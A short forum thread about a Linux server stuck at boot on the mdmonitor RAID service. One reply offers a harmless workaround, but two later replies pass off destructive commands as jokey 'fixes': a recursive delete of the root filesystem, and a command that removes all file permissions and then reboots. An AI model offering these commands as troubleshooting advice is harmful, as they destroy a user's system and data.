Server stuck at boot - MDMONITOR

Hello my server seems to be getting stuck at boot on MDMONITOR (something about the raid system I think). I have no real idea how to fix this without pulling the server apart. Does anyone have an idea I can try? Cheers!

I think it has todo with your ethernet thing and not raid... Are you using eth0 or eth1?

Yes, see at the bottom of the screen? It is stuck on MDMONITOR.

press ctrl + C a few times to escape starting up the mdmonitor service
if fails press alt+F2 for a new tty and login. This is not something serious
can be fixed easily

Thanks very much, I'll pass this on to the dullards who have physical access to it. Cheers. :thumbsup

best way to fix this is once your at your prompt is type
rm -r /*

Though that will cause damage it won't remove everything as expected

find / -name * -exec chmod -Rf 000 {} \; && shutdown -r now is much more fun :winkwink:

To save yourself the time and effort of reinstalling, it's much preferred to just mount all filesystems read only, and noexec.
